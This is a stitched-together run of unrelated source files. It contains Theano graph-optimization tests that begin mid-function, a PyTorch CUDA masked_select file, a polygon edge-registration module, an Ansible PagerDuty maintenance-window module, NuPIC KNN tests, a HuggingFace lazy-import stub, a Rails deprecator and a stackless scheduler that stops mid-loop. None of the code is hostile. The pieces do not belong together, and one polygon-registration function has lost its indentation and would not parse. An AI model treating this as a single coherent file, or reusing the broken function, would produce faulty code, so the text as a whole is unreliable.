            f(data)

            # -max(n): reduce followed by the negation.
            f = function([n], -tensor.max(n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 2
            assert isinstance(topo[0].op, CAReduce)
            assert isinstance(topo[1].op, Elemwise)
            assert isinstance(topo[1].op.scalar_op, scalar.Neg)
            f(data)

            # -max(-n) == min(n): both negations fold into a single reduce.
            f = function([n], -tensor.max(-n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 1
            assert isinstance(topo[0].op, CAReduce)  # min
            f(data)

    def test_optimization_min(self):
        """min and its negated variants must optimize to the expected graphs."""
        data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
        n = tensor.matrix()

        for axis in [0, 1, -1]:
            # Plain min(n): one CAReduce node only.
            f = function([n], tensor.min(n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 1
            assert isinstance(topo[0].op, CAReduce)
            f(data)

            # test variant with neg to make sure we optimize correctly
            # min(-n): reduce (a max) followed by negation.
            f = function([n], tensor.min(-n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 2
            assert isinstance(topo[0].op, CAReduce)  # max
            assert isinstance(topo[1].op, Elemwise)
            assert isinstance(topo[1].op.scalar_op, scalar.Neg)
            f(data)

            # -min(n): negation followed by the reduce (a max).
            f = function([n], -tensor.min(n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 2
            assert isinstance(topo[0].op, Elemwise)
            assert isinstance(topo[0].op.scalar_op, scalar.Neg)
            assert isinstance(topo[1].op, CAReduce)  # max
            f(data)

            # -min(-n) == max(n): negations fold into a single reduce.
            f = function([n], -tensor.min(-n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 1
            assert isinstance(topo[0].op, CAReduce)  # max
            f(data)
def test_local_alloc_dimshuffle():
    """After applying local_alloc_dimshuffle, the graph must contain at
    least one node that is not a DimShuffle."""
    opt = out2in(local_alloc_dimshuffle)

    vec = tensor.vector('x')
    size = tensor.iscalar('m')
    broadcasted = vec.dimshuffle('x', 0)
    out = tensor.alloc(broadcasted, size, 1, vec.shape[0])

    graph = FunctionGraph([vec, size], [out])
    opt(graph)
    nodes = graph.toposort()
    assert any(not isinstance(node, DimShuffle) for node in nodes)
def test_local_reshape_dimshuffle():
    """After applying local_reshape_dimshuffle, the graph must contain at
    least one node that is not a DimShuffle."""
    opt = out2in(local_reshape_dimshuffle)

    mat = tensor.matrix('x')
    expanded = mat.dimshuffle('x', 0, 'x', 1)
    out = tensor.reshape(expanded, (1, mat.shape[0] * mat.shape[1], 1))

    graph = FunctionGraph([mat], [out])
    opt(graph)
    nodes = graph.toposort()
    assert any(not isinstance(node, DimShuffle) for node in nodes)
def test_local_dimshuffle_alloc():
    """local_dimshuffle_alloc: a dimshuffle of an alloc should be rewritten,
    and the rewritten graph must still compute a 4-d result."""
    reshape_dimshuffle = out2in(local_dimshuffle_alloc)

    x = tensor.vector('x')

    # alloc produces a (3, 2) tensor; the dimshuffle adds two broadcast dims.
    out = tensor.alloc(x, 3, 2).dimshuffle('x', 'x', 0, 1)

    g = FunctionGraph([x], [out])
    reshape_dimshuffle(g)

    # Compile and run through the plain Python linker to verify the
    # optimized graph still produces a rank-4 output.
    l = theano.gof.PerformLinker()
    l.accept(g)
    f = l.make_function()

    assert f([3, 4]).ndim == 4

    topo = g.toposort()
    assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_subtensor():
    """local_dimshuffle_subtensor: dimshuffles of subtensor results should be
    rewritten, including when the dimshuffle drops broadcastable dims that the
    subtensor does not index."""
    dimshuffle_subtensor = out2in(local_dimshuffle_subtensor)

    # NOTE: `x` is rebound several times below; each case builds a fresh graph.
    x = tensor.dtensor4('x')
    x = tensor.patternbroadcast(x, (False, True, False, False))
    i = tensor.iscalar('i')

    # Slice then drop the broadcastable axis 1 with the dimshuffle.
    out = x[:, :, 10:30, ::i].dimshuffle(0, 2, 3)

    g = FunctionGraph([x, i], [out])
    dimshuffle_subtensor(g)

    topo = g.toposort()
    assert any([not isinstance(x, DimShuffle) for x in topo])

    # Test dimshuffle remove dimensions the subtensor don't "see".
    x = tensor.tensor(broadcastable=(False, True, False), dtype='float64')
    out = x[i].dimshuffle(1)

    g = FunctionGraph([x, i], [out])
    dimshuffle_subtensor(g)

    topo = g.toposort()
    assert any([not isinstance(x, DimShuffle) for x in topo])

    # Test dimshuffle remove dimensions the subtensor don't "see" but
    # have in between dimensions.
    x = tensor.tensor(broadcastable=(False, True, False, True),
                      dtype='float64')
    out = x[i].dimshuffle(1)

    # Compile end-to-end this time to check the runtime shape as well.
    f = theano.function([x, i], out)

    topo = f.maker.fgraph.toposort()
    assert any([not isinstance(x, DimShuffle) for x in topo])
    assert f(numpy.random.rand(5, 1, 4, 1), 2).shape == (4,)
#define TORCH_ASSERT_ONLY_METHOD_OPERATORS
#include <ATen/native/cuda/IndexKernel.h>
#include <ATen/native/TensorAdvancedIndexing.h> // For at::native::index_out
#include <ATen/core/Tensor.h>
#include <ATen/core/List.h>
#include <ATen/ExpandUtils.h>
#include <ATen/MemoryOverlap.h>
#include <ATen/NamedTensorUtils.h>
#ifndef AT_PER_OPERATOR_HEADERS
#include <ATen/Functions.h>
#include <ATen/NativeFunctions.h>
#include <ATen/CUDAFunctions.h>
#else
#include <ATen/ops/index_cuda_dispatch.h>
#include <ATen/ops/empty.h>
#include <ATen/ops/masked_scatter_native.h>
#include <ATen/ops/masked_select_native.h>
#endif
namespace at::native {
// Shared implementation for masked_select / masked_select_out on CUDA.
// masked_select is lowered to an advanced-indexing gather: the boolean mask
// is passed directly as the (single) index tensor to index_out.
static Tensor & masked_select_out_cuda_impl(Tensor & result, const Tensor & self, const Tensor & mask) {
  NoNamesGuard guard;

  TORCH_CHECK(mask.scalar_type() == ScalarType::Bool,
              "masked_select: expected BoolTensor for mask");
  TORCH_CHECK(self.scalar_type() == result.scalar_type(),
              "masked_select(): self and result must have the same scalar type");

  // Promote 0-d inputs to 1-d so the mutual expansion below is well-defined.
  // MaybeOwned avoids a refcount bump in the common (already >=1-d) case.
  auto mask_temp = (mask.dim() == 0)
    ? c10::MaybeOwned<Tensor>::owned(mask.unsqueeze(0))
    : c10::MaybeOwned<Tensor>::borrowed(mask);
  auto self_temp = (self.dim() == 0)
    ? c10::MaybeOwned<Tensor>::owned(self.unsqueeze(0))
    : c10::MaybeOwned<Tensor>::borrowed(self);

  // Cannot reassign to mask_temp and self_temp here! if they are
  // owning and expand_outplace returns a borrow, the returned borrow
  // would dangle.
  auto [mask_expanded, self_expanded] = expand_outplace(*mask_temp, *self_temp);
  at::cuda::index_out(
      result, *self_expanded,
      c10::List<std::optional<at::Tensor>>({*std::move(mask_expanded)}));

  return result;
}
// Functional variant: allocates an empty result with self's options and
// delegates to the shared implementation. Output names are computed from the
// broadcast of self and mask before the NoNamesGuard inside the impl.
Tensor masked_select_cuda(const Tensor & self, const Tensor & mask) {
  namedinference::compute_broadcast_outnames(self, mask);
  Tensor result = at::empty({0}, self.options());
  return masked_select_out_cuda_impl(result, self, mask);
}
// Out variant: caller supplies `result`; dtype agreement is validated inside
// the shared implementation.
Tensor & masked_select_out_cuda(const Tensor & self, const Tensor & mask, Tensor & result) {
  namedinference::compute_broadcast_outnames(self, mask);
  return masked_select_out_cuda_impl(result, self, mask);
}
// In-place masked_scatter_ on CUDA: copies elements of `source` into the
// positions of `self` where the (broadcast) boolean mask is true.
Tensor & masked_scatter__cuda(Tensor& self, const Tensor& mask, const Tensor& source) {
  at::assert_no_internal_overlap(self);
  TORCH_CHECK(
      self.scalar_type() == source.scalar_type(),
      "masked_scatter_: expected self and source to have same dtypes but got ",
      self.scalar_type(),
      " and ",
      source.scalar_type());
  TORCH_CHECK(mask.dtype() == ScalarType::Bool, "masked_scatter_ only supports boolean masks, "
    "but got mask with dtype ", mask.dtype());

  // Broadcast the mask against self in place; may borrow `mask` if no
  // expansion is needed.
  c10::MaybeOwned<Tensor> b_mask = expand_inplace(self, mask, "masked_scatter_");

  if (self.numel() == 0) {
    return self;
  }

  // Prefix sum over the mask gives, for each true element, its index into
  // `source` (computed inside the launched kernel).
  auto maskPrefixSum = at::empty(self.sizes(), mask.options().dtype(kLong));
  launch_masked_scatter_kernel(self, *b_mask, maskPrefixSum, source);

  return self;
}
} // namespace at::native | cpp | github | https://github.com/pytorch/pytorch | aten/src/ATen/native/cuda/IndexKernel.cpp |
'''
Created on Dec 1, 2016
@author: David Zwicker <dzwicker@seas.harvard.edu>
'''
from __future__ import division
import itertools
import numpy as np
from scipy import optimize, spatial
from six.moves import range
def _iter_problematic_edges(edges):
""" generator that goes through a list of edges and returns intervals that
are problematic, i.e., where the edge would cross a previous edge. Yields
pairs of indices that denote the indices of the edges that surround a
problem region. """
i = 1
while i < len(edges):
if edges[i] < edges[i - 1]:
# found problem
s = i - 1
e_s = edges[s]
i += 1
for j in range(i, len(edges)):
if edges[j] >= e_s:
# problem ends
yield s, j
i = j
break
else:
# problem did not end
if any(e > 0 for e in edges[s + 1:]):
yield s, len(edges)
else:
i += 1
def _fix_edge_order(edges, p_f, p_t, dists_ft):
    """ reassigns edges such that they don't cross and have minimal length

    `edges` maps each vertex of polygon F to a vertex index of polygon T;
    it is modified in place (and also returned).  `dists_ft` is the full
    pairwise distance matrix between the two polygons.
    """
    dim_f, dim_t = len(p_f), len(p_t)
    assert dists_ft.shape == (dim_f, dim_t)
    assert len(edges) == len(p_f)

    # iterate over all problematic regions and try to resolve them
    for f_s, f_e in _iter_problematic_edges(edges):
        # f_s is the index of the last correct vertex
        # f_e is the index of the first correct vertex after the problem

        # get candidate connections
        if f_e < dim_f:
            # candidate targets lie between the two surrounding good edges
            ts = np.arange(edges[f_s], edges[f_e] + 1)
        else:
            # problem runs to the end: allow wrapping back to target index 0
            ts = np.r_[np.arange(edges[f_s], dim_t), 0]
        subdists = dists_ft[f_s+1:f_e, ts]

        num_f = f_e - f_s - 1  # number of vertices to correct
        num_t = len(ts)        # number of vertices to choose from
        assert subdists.shape == (num_f, num_t)

        # iterate through all possibilities
        # NOTE: exhaustive search, O(num_t ** num_f) -- can be very slow for
        # long problem regions (also warned about in register_polygons' doc).
        best_offset, best_dist = None, np.inf
        for offset in itertools.product(range(num_t), repeat=num_f):
            d_offset = np.diff(offset)
            if np.any(d_offset < 0):
                # offsets must be non-decreasing to keep edges non-crossing
                continue
            dist = sum(subdists[i, offset[i]] for i in range(num_f))
            if dist < best_dist:
                best_dist = dist
                best_offset = offset

        # shift by 1 because np.diff shifted indices
        # (ts is contiguous except possibly a trailing 0, so ts[0] + offset
        # addresses the same targets; the wrap case is fixed up below)
        new_t = ts[0] + best_offset
        new_t[new_t >= dim_t] = 0
        edges[f_s + 1:f_e] = new_t

    return edges
def register_polygons(coords1, coords2):
    """ returns oriented edges between two polygons that are given by their
    coordinate sequences.

    The function returns two list describing the edges that connect the two
    polygons. The first list is of length `len(coords1)` and gives for each
    vertex of the first polygon an index into `coords2` to describe the edge.
    The second list is the associated list for edges from polygon 2 to 1.

    The algorithm tries to produce non-crossing edges with minimal length, which
    could be useful for morphing one polygon into the other. This algorithm
    works best when the centroids are close to each other. Note that this
    implementation iterates through all possible edge combinations of a
    problematic region. If the polygons are complex and don't overlap well, this
    algorithm might take a very long times to yield a result.
    """
    p1 = np.array(coords1, dtype=np.double, copy=True)
    p2 = np.array(coords2, dtype=np.double, copy=True)

    # build the distance matrix between the two polygons
    dists = spatial.distance_matrix(coords1, coords2)

    # find the points with minimal distance from each other
    # (if several pairs tie, the first one in row-major order is used)
    x, y = np.nonzero(dists == np.min(dists))
    x, y = x[0], y[0]

    # reorder the points such that the closest points are in the first position
    p1 = np.roll(p1, -x, axis=0)
    p2 = np.roll(p2, -y, axis=0)
    # keep the distance matrix consistent with the rolled coordinates
    dists = np.roll(np.roll(dists, -x, axis=0), -y, axis=1)
    # assert np.all(dists == spatial.distance_matrix(p1, p2))

    # potential edges from 1 to 2 and vice versa (nearest neighbor each way)
    e12 = np.argmin(dists, axis=1)
    e21 = np.argmin(dists, axis=0)

    # fix edge order in place
    _fix_edge_order(e12, p1, p2, dists)
    _fix_edge_order(e21, p2, p1, dists.T)

    # roll back the edges so they align with the original coordinates
    e12 = np.roll(e12, x)
    e12 = (e12 + y) % len(p2)
    e21 = np.roll(e21, y)
    e21 = (e21 + x) % len(p1)

    return e12, e21
def register_polygons_fast(coords1, coords2, ret_dists=False, opt_args=None):
    """ returns oriented edges between two polygons that are given by their
    coordinate sequences.

    The function returns two list describing the edges that connect the two
    polygons. The first list is of length `len(coords1)` and gives for each
    vertex of the first polygon an index into `coords2` to describe the edge.
    The second list is the associated list for edges from polygon 2 to 1.
    If `ret_dists` is True, the pairwise distance matrix is returned as well.

    The algorithm tries to produce non-crossing edges with minimal length, which
    could be useful for morphing one polygon into the other. This algorithm
    works best when the centroids are close to each other. This implementation
    uses stochastic global optimization to find a good solution quickly.
    However, this doesn't guarantee that the optimal solution is found.
    Moreover, subsequent calls with the same arguments might lead to different
    results. The algorithm uses `scipy.optimize.basinhopping` to find the
    solution with minimal total edge length. The optimization algorithm can be
    influences by passing suitable keyword arguments using `opt_args`
    """
    dim1, dim2 = len(coords1), len(coords2)

    # determine distance between all points
    dists = spatial.distance_matrix(coords1, coords2)

    # determine starting edge (with minimal distance)
    i1, i2 = np.unravel_index(np.argmin(dists), dists.shape)

    # place the other edges equidistantly in index space
    # (builtin `int` instead of the alias np.int, which NumPy 1.24 removed)
    e1 = np.roll(np.linspace(i2, i2 + dim2, num=dim1, dtype=int) % dim2, i1)
    e2 = np.roll(np.linspace(i1, i1 + dim1, num=dim2, dtype=int) % dim1, i2)
    x0 = np.r_[e1, e2]

    def calc_cost(x):
        """ cost function = total edge length """
        x = x.astype(int)
        x1, x2 = x[:dim1], x[dim1:]
        return (dists[np.arange(dim1), x1].sum() +
                dists[x2, np.arange(dim2)].sum())

    def take_step(x):
        """ modifies one edge randomly """
        for _ in range(10):  # test at most 10 edges
            k = np.random.randint(dim1 + dim2)
            if k < dim1:
                # modify edge from 1 to 2
                # cast explicitly: basinhopping hands us a float array and
                # np.random.randint requires integer bounds
                x_p = int(x[(k - 1) % dim1])
                x_n = int(x[(k + 1) % dim1])
                if x_n == x_p:
                    continue  # this edge is fixed => try another
                if x_n < x_p:
                    x_n += dim2  # wrap around
                x[k] = np.random.randint(x_p, x_n) % dim2
                break
            else:
                # modify edge from 2 to 1
                k -= dim1
                x_p = int(x[dim1 + (k - 1) % dim2])
                x_n = int(x[dim1 + (k + 1) % dim2])
                if x_n == x_p:
                    continue  # this edge is fixed => try another
                if x_n < x_p:
                    x_n += dim1  # wrap around
                x[dim1 + k] = np.random.randint(x_p, x_n) % dim1
                break
        return x

    # determine parameters; work on a copy so the caller's dict is not
    # mutated by the pop() below
    opt_args = {} if opt_args is None else dict(opt_args)
    niter = opt_args.pop('niter', None)
    if niter is None:
        niter = 10 * (dim1 + dim2)  # move each edge about 10 times

    # run the global optimization
    res = optimize.basinhopping(calc_cost, x0, niter=niter, take_step=take_step,
                                **opt_args)

    # return optimal edges
    x = res.x.astype(int)
    if ret_dists:
        return x[:dim1], x[dim1:], dists
    else:
        return x[:dim1], x[dim1:]
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
module: pagerduty
short_description: Create PagerDuty maintenance windows
description:
- This module will let you create PagerDuty maintenance windows
version_added: "1.2"
author:
- "Andrew Newdigate (@suprememoocow)"
- "Dylan Silva (@thaumos)"
- "Justin Johns"
- "Bruce Pennypacker"
requirements:
- PagerDuty API access
options:
state:
description:
- Create a maintenance window or get a list of ongoing windows.
required: true
default: null
choices: [ "running", "started", "ongoing", "absent" ]
aliases: []
name:
description:
- PagerDuty unique subdomain.
required: true
default: null
choices: []
aliases: []
user:
description:
- PagerDuty user ID.
required: true
default: null
choices: []
aliases: []
passwd:
description:
- PagerDuty user password.
required: true
default: null
choices: []
aliases: []
token:
description:
- A pagerduty token, generated on the pagerduty site. Can be used instead of
user/passwd combination.
required: true
default: null
choices: []
aliases: []
version_added: '1.8'
requester_id:
description:
- ID of user making the request. Only needed when using a token and creating a maintenance_window.
required: true
default: null
choices: []
aliases: []
version_added: '1.8'
service:
description:
- A comma separated list of PagerDuty service IDs.
required: false
default: null
choices: []
aliases: [ services ]
hours:
description:
- Length of maintenance window in hours.
required: false
default: 1
choices: []
aliases: []
minutes:
description:
- Maintenance window in minutes (this is added to the hours).
required: false
default: 0
choices: []
aliases: []
version_added: '1.8'
desc:
description:
- Short description of maintenance window.
required: false
default: Created by Ansible
choices: []
aliases: []
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 1.5.1
'''
EXAMPLES='''
# List ongoing maintenance windows using a user/passwd
- pagerduty: name=companyabc user=example@example.com passwd=password123 state=ongoing
# List ongoing maintenance windows using a token
- pagerduty: name=companyabc token=xxxxxxxxxxxxxx state=ongoing
# Create a 1 hour maintenance window for service FOO123, using a user/passwd
- pagerduty: name=companyabc
user=example@example.com
passwd=password123
state=running
service=FOO123
# Create a 5 minute maintenance window for service FOO123, using a token
- pagerduty: name=companyabc
token=xxxxxxxxxxxxxx
hours=0
minutes=5
state=running
service=FOO123
# Create a 4 hour maintenance window for service FOO123 with the description "deployment".
- pagerduty: name=companyabc
user=example@example.com
passwd=password123
state=running
service=FOO123
hours=4
desc=deployment
register: pd_window
# Delete the previous maintenance window
- pagerduty: name=companyabc
user=example@example.com
passwd=password123
state=absent
service={{ pd_window.result.maintenance_window.id }}
'''
import datetime
import base64
def auth_header(user, passwd, token):
    """Build the value of the HTTP Authorization header.

    A token takes precedence; otherwise HTTP Basic credentials are encoded.
    """
    if token:
        return "Token token=%s" % token
    # base64.encodestring() was Python-2-only (removed in Python 3.9) and
    # inserted newlines that then had to be stripped; b64encode() has
    # neither problem and works on both Python 2 and 3.
    auth = base64.b64encode(('%s:%s' % (user, passwd)).encode('utf-8')).decode('ascii')
    return "Basic %s" % auth
def ongoing(module, name, user, passwd, token):
    """Fetch the list of currently ongoing maintenance windows.

    Returns a (rc, result, changed) triple where rc is always False and
    changed is always False (read-only operation).
    """
    url = "https://" + name + ".pagerduty.com/api/v1/maintenance_windows/ongoing"
    headers = {"Authorization": auth_header(user, passwd, token)}

    response, info = fetch_url(module, url, headers=headers)
    if info['status'] != 200:
        module.fail_json(msg="failed to lookup the ongoing window: %s" % info['msg'])

    try:
        json_out = json.loads(response.read())
    except:
        # Deliberate best-effort: an unparsable body is reported as "".
        json_out = ""

    return False, json_out, False
def create(module, name, user, passwd, token, requester_id, service, hours, minutes, desc):
    """Create a maintenance window lasting hours + minutes from now (UTC).

    Returns a (rc, result, changed) triple where rc is always False and
    changed is True.
    """
    now = datetime.datetime.utcnow()
    later = now + datetime.timedelta(hours=int(hours), minutes=int(minutes))
    start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
    end = later.strftime("%Y-%m-%dT%H:%M:%SZ")

    url = "https://" + name + ".pagerduty.com/api/v1/maintenance_windows"
    headers = {
        'Authorization': auth_header(user, passwd, token),
        'Content-Type' : 'application/json',
    }
    request_data = {'maintenance_window': {'start_time': start, 'end_time': end, 'description': desc, 'service_ids': service}}

    # NOTE(review): requester_id is placed at the top level of the payload,
    # not inside 'maintenance_window' -- verify against the PagerDuty v1 API.
    if requester_id:
        request_data['requester_id'] = requester_id
    else:
        if token:
            module.fail_json(msg="requester_id is required when using a token")

    data = json.dumps(request_data)
    response, info = fetch_url(module, url, data=data, headers=headers, method='POST')
    if info['status'] != 200:
        module.fail_json(msg="failed to create the window: %s" % info['msg'])

    try:
        json_out = json.loads(response.read())
    except:
        # Deliberate best-effort: an unparsable body is reported as "".
        json_out = ""

    return False, json_out, True
def absent(module, name, user, passwd, token, requester_id, service):
    """Delete the maintenance window whose id is service[0].

    Returns a (rc, result, changed) triple where rc is always False and
    changed is True.
    """
    url = "https://" + name + ".pagerduty.com/api/v1/maintenance_windows/" + service[0]
    headers = {
        'Authorization': auth_header(user, passwd, token),
        'Content-Type' : 'application/json',
    }
    request_data = {}

    if requester_id:
        request_data['requester_id'] = requester_id
    else:
        if token:
            module.fail_json(msg="requester_id is required when using a token")

    data = json.dumps(request_data)
    response, info = fetch_url(module, url, data=data, headers=headers, method='DELETE')
    if info['status'] != 200:
        module.fail_json(msg="failed to delete the window: %s" % info['msg'])

    try:
        json_out = json.loads(response.read())
    except:
        # Deliberate best-effort: an unparsable body is reported as "".
        json_out = ""

    return False, json_out, True
def main():
    """Entry point: parse the module arguments and dispatch on ``state``."""
    module = AnsibleModule(
        argument_spec=dict(
            state=dict(required=True, choices=['running', 'started', 'ongoing', 'absent']),
            name=dict(required=True),
            user=dict(required=False),
            passwd=dict(required=False),
            token=dict(required=False),
            service=dict(required=False, type='list', aliases=["services"]),
            requester_id=dict(required=False),
            hours=dict(default='1', required=False),
            minutes=dict(default='0', required=False),
            desc=dict(default='Created by Ansible', required=False),
            validate_certs=dict(default='yes', type='bool'),
        )
    )

    state = module.params['state']
    name = module.params['name']
    user = module.params['user']
    passwd = module.params['passwd']
    # FIX: `token` was read twice from module.params; the duplicate
    # assignment has been removed.
    token = module.params['token']
    service = module.params['service']
    hours = module.params['hours']
    minutes = module.params['minutes']
    desc = module.params['desc']
    requester_id = module.params['requester_id']

    if not token and not (user or passwd):
        module.fail_json(msg="neither user and passwd nor token specified")

    if state == "running" or state == "started":
        if not service:
            module.fail_json(msg="service not specified")
        (rc, out, changed) = create(module, name, user, passwd, token,
                                    requester_id, service, hours, minutes, desc)
        # NOTE: create() returns rc=False, and False == 0 in Python, so this
        # always marks the task changed (preserved original behavior).
        if rc == 0:
            changed = True

    if state == "ongoing":
        (rc, out, changed) = ongoing(module, name, user, passwd, token)

    if state == "absent":
        (rc, out, changed) = absent(module, name, user, passwd, token,
                                    requester_id, service)

    if rc != 0:
        module.fail_json(msg="failed", result=out)

    module.exit_json(msg="success", result=out, changed=changed)
# import module snippets
# The wildcard imports below inject AnsibleModule, fetch_url and json into
# this module's namespace (Ansible's classic module-snippet mechanism);
# they must stay at the bottom, after all definitions.
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *

main()
#! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import numpy as np
import unittest
from nupic.algorithms.KNNClassifier import KNNClassifier
class KNNClassifierTest(unittest.TestCase):
    """Unit tests for KNNClassifier using the rawOverlap distance method.

    Uses ``assertEqual`` throughout: the ``assertEquals`` alias is deprecated
    since Python 2.7/3.2 and removed in Python 3.12.
    """

    def testOverlapDistanceMethodStandard(self):
        """Tests standard learning case for raw overlap"""
        params = {"distanceMethod": "rawOverlap"}
        classifier = KNNClassifier(**params)

        dimensionality = 40
        a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)
        b = np.array([2, 4, 8, 12, 14, 18, 20, 28, 30], dtype=np.int32)

        numPatterns = classifier.learn(a, 0, isSparse=dimensionality)
        self.assertEqual(numPatterns, 1)

        numPatterns = classifier.learn(b, 1, isSparse=dimensionality)
        self.assertEqual(numPatterns, 2)

        denseA = np.zeros(dimensionality)
        denseA[a] = 1.0
        cat, _, _, _ = classifier.infer(denseA)
        self.assertEqual(cat, 0)

        denseB = np.zeros(dimensionality)
        denseB[b] = 1.0
        cat, _, _, _ = classifier.infer(denseB)
        self.assertEqual(cat, 1)

    def testOverlapDistanceMethodBadSparsity(self):
        """Sparsity (input dimensionality) less than input array"""
        params = {"distanceMethod": "rawOverlap"}
        classifier = KNNClassifier(**params)

        a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)

        # Learn with incorrect dimensionality, less than some bits (23, 29)
        with self.assertRaises(RuntimeError):
            classifier.learn(a, 0, isSparse=20)

    def testOverlapDistanceMethodInconsistentDimensionality(self):
        """Inconsistent sparsity (input dimensionality)"""
        params = {"distanceMethod": "rawOverlap"}
        classifier = KNNClassifier(**params)

        dimensionality = 40
        a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)

        # Learn with incorrect dimensionality, greater than largest ON bit, but
        # inconsistent when inferring
        numPatterns = classifier.learn(a, 0, isSparse=31)
        self.assertEqual(numPatterns, 1)

        denseA = np.zeros(dimensionality)
        denseA[a] = 1.0
        cat, _, _, _ = classifier.infer(denseA)
        self.assertEqual(cat, 0)

    def testOverlapDistanceMethodStandardUnsorted(self):
        """If sparse representation indices are unsorted expect error."""
        params = {"distanceMethod": "rawOverlap"}
        classifier = KNNClassifier(**params)

        dimensionality = 40
        a = np.array([29, 3, 7, 11, 13, 17, 19, 23, 1], dtype=np.int32)
        b = np.array([2, 4, 20, 12, 14, 18, 8, 28, 30], dtype=np.int32)

        with self.assertRaises(RuntimeError):
            classifier.learn(a, 0, isSparse=dimensionality)

        with self.assertRaises(RuntimeError):
            classifier.learn(b, 1, isSparse=dimensionality)

    def testOverlapDistanceMethodEmptyArray(self):
        """Tests case where pattern has no ON bits"""
        params = {"distanceMethod": "rawOverlap"}
        classifier = KNNClassifier(**params)

        dimensionality = 40
        a = np.array([], dtype=np.int32)

        numPatterns = classifier.learn(a, 0, isSparse=dimensionality)
        self.assertEqual(numPatterns, 1)

        denseA = np.zeros(dimensionality)
        denseA[a] = 1.0
        cat, _, _, _ = classifier.infer(denseA)
        self.assertEqual(cat, 0)

    @unittest.skip("Finish when infer has options for sparse and dense "
                   "https://github.com/numenta/nupic/issues/2198")
    def testOverlapDistanceMethod_ClassifySparse(self):
        params = {"distanceMethod": "rawOverlap"}
        classifier = KNNClassifier(**params)

        dimensionality = 40
        a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)
        b = np.array([2, 4, 8, 12, 14, 18, 20, 28, 30], dtype=np.int32)

        classifier.learn(a, 0, isSparse=dimensionality)
        classifier.learn(b, 1, isSparse=dimensionality)

        # TODO Test case where infer is passed a sparse representation after
        # infer() has been extended to handle sparse and dense
        cat, _, _, _ = classifier.infer(a)
        self.assertEqual(cat, 0)

        cat, _, _, _ = classifier.infer(b)
        self.assertEqual(cat, 1)


if __name__ == "__main__":
    unittest.main()
# Copyright 2025 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import _LazyModule
from ...utils.import_utils import define_import_structure
if TYPE_CHECKING:
    # For static type checkers, expose the submodules' symbols eagerly.
    from .configuration_dots1 import *
    from .modeling_dots1 import *
else:
    import sys

    # At runtime, replace this package module with a lazy proxy so the heavy
    # submodules are imported only on first attribute access.
    _file = globals()["__file__"]
    sys.modules[__name__] = _LazyModule(__name__, _file, define_import_structure(_file), module_spec=__spec__)
# frozen_string_literal: true
module ActiveModel
  # Returns the ActiveSupport::Deprecation instance used by Active Model,
  # memoized on first access.
  def self.deprecator # :nodoc:
    @deprecator ||= ActiveSupport::Deprecation.new
  end
end
"""Provides scheduling routines for stackless tasklets.
The scheduler itself runs as a tasklet. It blocks waiting
for input on the channel passed in. When new data is sent
on this channel, the scheduler wakes and begins processing
of the data.
"""
import stackless
from pype import Pype
from graph import get_pairlist, topsort
import sys
import traceback
def sched(ch, graph):
    """Sits in an infinite loop waiting on the channel to recieve data.

    The procedure prolog takes care of sorting the
    input graph into a dependency list and initializing
    the filter tasklets used to construct the graph.

    @param graph: The graph representing the work flow
    @type graph: Python dict organized as a graph struct
    @param ch: The stackless channel to listen on
    @type ch: stackless.channel
    @return: nothing
    """
    # Topologically sort the graph so downstream nodes are wired after
    # their producers.
    edgeList = get_pairlist(graph)
    nodes = topsort(edgeList)
    tasks = []
    inputEdge = Pype()
    for n in nodes:
        # start this microthread
        tasks.append(stackless.tasklet(n.run)())
        try:
            # get this nodes outputs
            edges = graph[n]
        except:
            # sink node: no outgoing edges in the graph dict
            pass
        else:
            # for each output, create a pipe and wire producer -> consumer
            for e in edges:
                e1 = Pype()
                # does this port exist
                if not n.has_port(edges[e][0]):
                    print 'Trying to connect undefined output port', n, edges[e][0]
                    sys.exit(1)
                n.connect_output(edges[e][0], e1)
                # does this port exist
